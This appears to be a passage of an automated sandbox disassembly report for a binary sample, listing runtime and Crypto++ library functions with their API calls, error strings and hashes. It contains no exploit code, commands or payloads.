                                          Function 009D0EA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009D0F7E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_
                                          • String ID: .PBF$w#G!
                                          • API String ID: 323602529-4168750012
                                          • Opcode ID: 06c6dd9822e5039838acdf824f09c9268355e000948cd36dc5f1728cf581d5ba
                                          • Instruction ID: dc1792562596557bf220d6d422ba974b62f5a71f9a625631710d71d793f3ac8d
                                          • Opcode Fuzzy Hash: 06c6dd9822e5039838acdf824f09c9268355e000948cd36dc5f1728cf581d5ba
                                          • Instruction Fuzzy Hash: D2314B75604206CFC722CF29C588BA9FBF9FF49704F1482ADE8099B351D771A916CB50
                                          Function 00A75322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • WriteFile.KERNEL32(7408458B,?,?,?,00000000,?,00A6AB2E,E0830C40,?,00A7575F,00A28F76,00A6AB2E,?,00A6AB2E,00A6AB2E,00A28F76), ref: 00A753CC
                                          • GetLastError.KERNEL32(?,00A7575F,00A28F76,00A6AB2E,?,00A6AB2E,00A6AB2E,00A28F76,00A6AB2E,?,00ACCEE0,00000014,00A61B64,00000000,8304488B,00A28F76), ref: 00A753F5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastWrite
                                          • String ID: w#G!
                                          • API String ID: 442123175-519468572
                                          • Opcode ID: a588af528d39a77293129558fbb530d4041e4633d89064a84d3e95b8476691de
                                          • Instruction ID: 93dd7eb430b3e8813ea759ef48e03896b98ad55b286e322772986fcf2adfc539
                                          • Opcode Fuzzy Hash: a588af528d39a77293129558fbb530d4041e4633d89064a84d3e95b8476691de
                                          • Instruction Fuzzy Hash: BB317575B00615DBCB24CF6ACD809DAB3F5EF48341B1485AAE50DD7260E7B0AD85CB54
                                          Function 009F6530 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F65E1
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • : this object doesn't support a special last block, xrefs: 009F65B2
                                          • w#G!, xrefs: 009F6544
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: : this object doesn't support a special last block$w#G!
                                          • API String ID: 3976011213-1747694321
                                          • Opcode ID: 7a845b52a253545942d394806d327422cf862cb6abc8a3355255d9ca0d256268
                                          • Instruction ID: 83e775c4d598bce8d8943175ea2729ef6fd25faabc83f5beb08102cf55924ec0
                                          • Opcode Fuzzy Hash: 7a845b52a253545942d394806d327422cf862cb6abc8a3355255d9ca0d256268
                                          • Instruction Fuzzy Hash: 29215076A00308AFCB11DFA4D945FEEBBB8FB48710F004559F915A7381DB74A914CB90
                                          Function 009EB150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                          Download Yara Rule
                                          APIs
                                          • __Mtx_unlock.LIBCPMT ref: 009EB214
                                            • Part of subcall function 00A4079A: EnterCriticalSection.KERNEL32(00AD87E8,00AD9528,?,?,00A148C1,00AD7168,21472377,00AD9528,?,?,00000000,00A8DADF,000000FF,?,00A1497C,00000001), ref: 00A407A5
                                            • Part of subcall function 00A4079A: LeaveCriticalSection.KERNEL32(00AD87E8,?,00A148C1,00AD7168,21472377,00AD9528,?,?,00000000,00A8DADF,000000FF,?,00A1497C,00000001), ref: 00A407E2
                                          • __Mtx_init_in_situ.LIBCPMT ref: 009EB1A6
                                            • Part of subcall function 00A293E0: Concurrency::details::create_stl_critical_section.LIBCPMT ref: 00A293EB
                                            • Part of subcall function 00A40C27: __onexit.LIBCMT ref: 00A40C2D
                                            • Part of subcall function 00A40750: EnterCriticalSection.KERNEL32(00AD87E8,?,?,00A148EF,00AD7168,00A91FF0,00000001), ref: 00A4075A
                                            • Part of subcall function 00A40750: LeaveCriticalSection.KERNEL32(00AD87E8,?,00A148EF,00AD7168,00A91FF0,00000001), ref: 00A4078D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$Concurrency::details::create_stl_critical_sectionMtx_init_in_situMtx_unlock__onexit
                                          • String ID: w#G!
                                          • API String ID: 910381318-519468572
                                          • Opcode ID: 88a2b75f55024a45533831b3331519dc395715591784a9b60a00e1812d99a7ca
                                          • Instruction ID: 006bdf59c58bcf73867744ab08f9fdbe8930053b5d61f63b57857ccbac7a9613
                                          • Opcode Fuzzy Hash: 88a2b75f55024a45533831b3331519dc395715591784a9b60a00e1812d99a7ca
                                          • Instruction Fuzzy Hash: 0D21F9B1A40250AFD711DB95ED02F5B33A8FF14B20F044A36F91797781E775AD008B82
                                          Function 009B6B50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B6BD3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: w#G!$w#G!
                                          • API String ID: 2005118841-1134387879
                                          • Opcode ID: 0542620000043b6db9170b79c27014c1ec38ea3d4cc6b261e568a84e66d91918
                                          • Instruction ID: f6391f4a1cfb3a9cc27bef9c02416f053f5cee2619fbfac541d1fd69fcc76895
                                          • Opcode Fuzzy Hash: 0542620000043b6db9170b79c27014c1ec38ea3d4cc6b261e568a84e66d91918
                                          • Instruction Fuzzy Hash: D111E631908758ABCB10EBA4D941BDABBBCEB05714F04456EF91597681D7B5B9008780
                                          Function 009B2A30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 009B2A56
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009B2AEA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Locinfo::_Locinfo_dtorLockitLockit::~_
                                          • String ID: w#G!
                                          • API String ID: 3286764726-519468572
                                          • Opcode ID: 12be384398c99cff52daee0ec52a3859423a7c1072503639e1fb5167563feefa
                                          • Instruction ID: 8ede57aa83e3203f56e7f4479d126c3b87474983b696ec74adbc32a131c3cb82
                                          • Opcode Fuzzy Hash: 12be384398c99cff52daee0ec52a3859423a7c1072503639e1fb5167563feefa
                                          • Instruction Fuzzy Hash: DD11F1F1A007405BDB30EF65DE49B67B7ECEB14710F048629E84E97681EB75E9048B92
                                          Function 00A72CF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00A72D56
                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A72D63
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AddressProc__crt_fast_encode_pointer
                                          • String ID: w#G!
                                          • API String ID: 2279764990-519468572
                                          • Opcode ID: 6656eefbc7f78baf7554ce3c887971fcdc5b78c7274b22843219142a3dff5b03
                                          • Instruction ID: 7c64c691b09a16f8a9fb1a2a0e6e3107e02f98a67ce4e5bf833b1d78c4a5b0ad
                                          • Opcode Fuzzy Hash: 6656eefbc7f78baf7554ce3c887971fcdc5b78c7274b22843219142a3dff5b03
                                          • Instruction Fuzzy Hash: 9211C637A006219F9B32DF69EC50B5B73A5EB8476071BC220FE19AB256E630DC0287D0
                                          Function 009F8DA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F8DF1
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • PK_MessageEncodingMethod: this signature scheme does not support message recovery, xrefs: 009F8DC8
                                          • w#G!, xrefs: 009F8DB4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: PK_MessageEncodingMethod: this signature scheme does not support message recovery$w#G!
                                          • API String ID: 3976011213-1159209045
                                          • Opcode ID: 907217d7418d8ef818daf77bc85bfa973fda7cd6f931447a5aaeae22a4649d4f
                                          • Instruction ID: 72122f9c940e559cc01eb0277ee8271f4484cdb2a293f4cea1e2af6dcd96b8ea
                                          • Opcode Fuzzy Hash: 907217d7418d8ef818daf77bc85bfa973fda7cd6f931447a5aaeae22a4649d4f
                                          • Instruction Fuzzy Hash: 4F015E71914208BBCF01EF90DD02FEFBBA8FF44724F410929F91176291EB71A919C6A1
                                          Function 00A405BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00A417A0
                                          • ___raise_securityfailure.LIBCMT ref: 00A41887
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                          • String ID: w#G!
                                          • API String ID: 3761405300-519468572
                                          • Opcode ID: 472751e101c90877446c78643bcb132d460a41749d2e79d2dde4e5474da2581a
                                          • Instruction ID: e72032675ec5ceb9e4ecc7f7a08615d52785e873c78f2926a95cf51b22f1db6d
                                          • Opcode Fuzzy Hash: 472751e101c90877446c78643bcb132d460a41749d2e79d2dde4e5474da2581a
                                          • Instruction Fuzzy Hash: A72137B8503300DED710CF99FDA5A243BE4FB48754F50446BE6468B3A0EBB84482CF46
                                          Function 009F72A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F7338
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: : this object cannot use a null IV$w#G!
                                          • API String ID: 2005118841-1087617168
                                          • Opcode ID: eb52016635c714b036a8415d78ca1de908dbb43e3523f3962060186845f7da7f
                                          • Instruction ID: d31ee3d9bf923619f38f9e83e324e9fceaea8fbbcc7eac88cf447d136f3c5485
                                          • Opcode Fuzzy Hash: eb52016635c714b036a8415d78ca1de908dbb43e3523f3962060186845f7da7f
                                          • Instruction Fuzzy Hash: 21119175A04248EFCB15DFE4C845FEEBBB8FB08710F104669F91697281DB74A904CB90
                                          Function 009B6492 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B64EE
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          Strings
                                          • w#G!, xrefs: 009B64B4
                                          • RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 009B64C5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ExceptionException@8RaiseThrow
                                          • String ID: RandomNumberGenerator: IncorporateEntropy not implemented$w#G!
                                          • API String ID: 3976011213-434694297
                                          • Opcode ID: 1f0375b6284c0b6e9e55dbbb738d147fcad8624c2c286c6cc0a1982c442d0abc
                                          • Instruction ID: 7407525bc1168dc03dd92ab939bad818f382dbc65f1ccc2e69d2ff9f8d43dcf6
                                          • Opcode Fuzzy Hash: 1f0375b6284c0b6e9e55dbbb738d147fcad8624c2c286c6cc0a1982c442d0abc
                                          • Instruction Fuzzy Hash: 3DF03071940608EBC705EF95DD42FDD77FCFB08714F510665A911A3590DB35AA04CA90
                                          Function 009B8420 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B848B
                                          Strings
                                          • w#G!, xrefs: 009B8434
                                          • CipherModeBase: feedback size cannot be specified for this cipher mode, xrefs: 009B8462
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: CipherModeBase: feedback size cannot be specified for this cipher mode$w#G!
                                          • API String ID: 2005118841-1771683453
                                          • Opcode ID: 4de1247e66252b5eba2500d702a73df219adfa9babc802507186fb3cc870e170
                                          • Instruction ID: cdcd0234568c21fd6e6c3bdb5fa2858df0f204acff4f707dcee1cb64098f5ab9
                                          • Opcode Fuzzy Hash: 4de1247e66252b5eba2500d702a73df219adfa9babc802507186fb3cc870e170
                                          • Instruction Fuzzy Hash: EA017C71A00148EBCB04DF50CA81FAEBBF8FB18714F2045A9E811A7680DB31EA05CBA0
                                          Function 00A847DE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___crtAcquireSRWLockExclusive.LIBCPMT ref: 00A847BD
                                          • ___crtAcquireSRWLockExclusive.LIBCPMT ref: 00A847D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AcquireExclusiveLock___crt
                                          • String ID: w#G!
                                          • API String ID: 4204951410-519468572
                                          • Opcode ID: 9b2d35d0db0d71240e5bbfbd1c99910e88db4e3aca69bf40726557a90d322f4a
                                          • Instruction ID: 0a462c2201fc7228c7d01b9b9c9b7dc9bb535029c98fc2cab6a8db1f7ebaf1d8
                                          • Opcode Fuzzy Hash: 9b2d35d0db0d71240e5bbfbd1c99910e88db4e3aca69bf40726557a90d322f4a
                                          • Instruction Fuzzy Hash: 15016D79605266978768EF5CF9408E277E9EB4A720314856BE942CB740CB34EC42CB80
                                          Function 00A733E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • LCMapStringW.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,00000001,?,00A7E74B,00A7E74B,?,?), ref: 00A73451
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: String
                                          • String ID: LCMapStringEx$w#G!
                                          • API String ID: 2568140703-1436762660
                                          • Opcode ID: 43e940ca74ec7394366ddd8c46a376496583818435f8de072a965ac7390c98e2
                                          • Instruction ID: 9edf9a49be15c097ddc63400f6fc94c15237397de74787141747b6895a09c448
                                          • Opcode Fuzzy Hash: 43e940ca74ec7394366ddd8c46a376496583818435f8de072a965ac7390c98e2
                                          • Instruction Fuzzy Hash: 71012532640208BBCF029FA0CD01DEE3FB6FF18751F018524FE1866160CA728A31EB80
                                          Function 009E6670 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009E66FA
                                          Strings
                                          • AllocatorBase: requested size would cause integer overflow, xrefs: 009E66D1
                                          • w#G!, xrefs: 009E6684
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: AllocatorBase: requested size would cause integer overflow$w#G!
                                          • API String ID: 2005118841-2993062273
                                          • Opcode ID: fde31e7a95d8b96b8ee2836f4620c6dbde9708668af43b7a326f9c6d89810104
                                          • Instruction ID: fdf359637651dd4bcbda280e48b1d1bd3343e08cfec7b70280a0a933508df871
                                          • Opcode Fuzzy Hash: fde31e7a95d8b96b8ee2836f4620c6dbde9708668af43b7a326f9c6d89810104
                                          • Instruction Fuzzy Hash: 5301B172D04688ABDB15EBA0DD42FDEB7BCF718B50F104A6AEC11A3780EB35AD04C650
                                          Function 00A73098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
